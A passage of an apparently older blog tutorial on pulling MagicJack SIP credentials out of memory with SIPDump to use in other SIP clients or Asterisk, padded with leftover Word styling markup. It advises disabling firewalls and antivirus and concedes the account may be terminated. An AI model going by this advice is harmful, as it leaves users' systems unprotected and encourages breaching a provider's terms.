mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} a:link, span.MsoHyperlink 	{mso-style-priority:99; 	color:blue; 	mso-themecolor:hyperlink; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:purple; 	mso-themecolor:followedhyperlink; 	text-decoration:underline; 	text-underline:single;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <a href="http://www.counterpath.com/xlite-comparison.html">http://www.counterpath.com/xlite-comparison.html</a> .This is a soft phone that we will for testing our credentials. You can use any soft phone you want or any SIP client you want for testing, such as an iPhone. Though I will use this one for the article. The current 3.0 code of the Xlite application does not require you to sue the MJMD5 proxy as it uses md5 to encrypt your password already.</li>
<li><strong>Windows firewall, Antivirus Firewalls, Software Firewalls, and or Hardware firewalls: </strong>Make sure these are disabled as this adds to the trouble shooting. Or open up your system to allow all outbound connections and inbound connections (UDP is not stateful) for the testing. If you are worried about your security please Google 1 to 1 NAT or PAT’s and create a policy that way.<strong> </strong></li>
<li><strong>MJProxy: </strong><a href="http://digitaloffensive.com/mjproxy.c.tar.gz" target="_blank">http://www.digitaloffensive.com/mjproxy.c.tar.gz</a> Linux Magic Jack Proxy. This is like the MJMD5 proxy but for Linux.<strong> </strong></li>
<li><strong>Trixbox: </strong><a href="http://www.trixbox.org/downloads">http://www.trixbox.org/downloads</a> (or any other asterisk system you feel comfortable with). An easy to use asterisk system widely used in the community.</li>
</ol>
<p><strong><span style="text-decoration: underline;">Besides the tools listed above you will need the following:</span></strong></p>
<ol>
<li><strong>Patience:</strong> This is key in doing this. If you think you are going to run a few commands and get the goods you are wrong.</li>
<li><strong>2. </strong><strong>Computer Skills: </strong>If you do not have basic to intermediate computer skills and the ability to follow directions, just stop now.<strong> </strong></li>
<li><strong>3. </strong><strong>Linux Skills:</strong> If you plan to use this as part of your Asterisk, Trixbox, Free PBX and so on systems.<strong> </strong></li>
</ol>
<p><strong><span style="text-decoration: underline;">Setup and Registration of your Magic Jack:</span></strong></p>
<p>So let’s get started. The first thing you will need to do is put your Magic Jack in the USB and register your Magic Jack. This will walk you through upgrading the Magic Jack firmware, setting up your Magic Jack account, setting up E911 and obtaining a telephone number. Be warned that during the whole process they try to sell you additional services, so be careful where you click.  Once you have completed your Magic Jack setup, I would use their soft phone to make a test call to verify everything is working before continuing. This will help eliminate additional troubleshooting steps if there is a problem later on in this article. If you do not have a phone to plug into the Magic Jack, go to “menu” tab and choose headset, this will allow you to use your computer speaker and mic. Once you have done this place a call to someone. I called my cell phone to test, so I would not bother any one while I went through the rest of the setup and tests.</p>
<p><strong><span style="text-decoration: underline;">Get SIP Info and Proxy Info</span></strong></p>
<p><span style="color: #ff0000;"><strong>I do not guarantee this will work and doing this may get your account terminated.</strong></span></p>
<p>Now that we have a working Magic Jack we can start the process of trying to get the SIP info from the Magic Jack. Most of you already know that the Magic Jack stores its SIP info temporarily in memory on initial start up, so for us to get this information we will need to dump the memory and look through the output for the password. To do this we will use the SIPDump.exe that we have downloaded earlier.</p>
<p>Timing is everything on this step and it may need to be repeated several times to get the information you need.</p>
<p><!--[if !mso]> <mce:style><!  v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} --> <!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;} @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} a:link, span.MsoHyperlink 	{mso-style-priority:99; 	color:blue; 	mso-themecolor:hyperlink; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:purple; 	mso-themecolor:followedhyperlink; 	text-decoration:underline; 	text-underline:single;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1974752171; 	mso-list-type:hybrid; 	mso-list-template-ids:-676023380 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l0:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l0:level3 	{mso-level-number-format:roman-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:right; 	text-indent:-9.0pt;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --></p>
<p class="MsoNormal">Timing is everything on this step and it may need to be repeated several times to get the information you need.</p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>1.Open the SIPDump.exe and set the dumps to 4. <strong><span style="color: red;">DO NOT HIT OK YET.</span></strong></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; text-align: center;"><strong><span style="color: red;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/sipdump1.jpg"> </a><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/sipdump1.jpg" target="_blank"><img class="size-medium wp-image-129 aligncenter" title="sipdump1" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/sipdump1-300x166.jpg" alt="" width="300" height="166" /></a></span></strong><span style="color: #000000;"> </span></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; text-align: center;"><span style="color: #000000;">Click for a larger image</span><strong><span style="color: red;"><br />
</span></strong></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>2. Next start up your Magic Jack software, either unplug it and plug it back in or go the drive and select autorun.exe.</p>
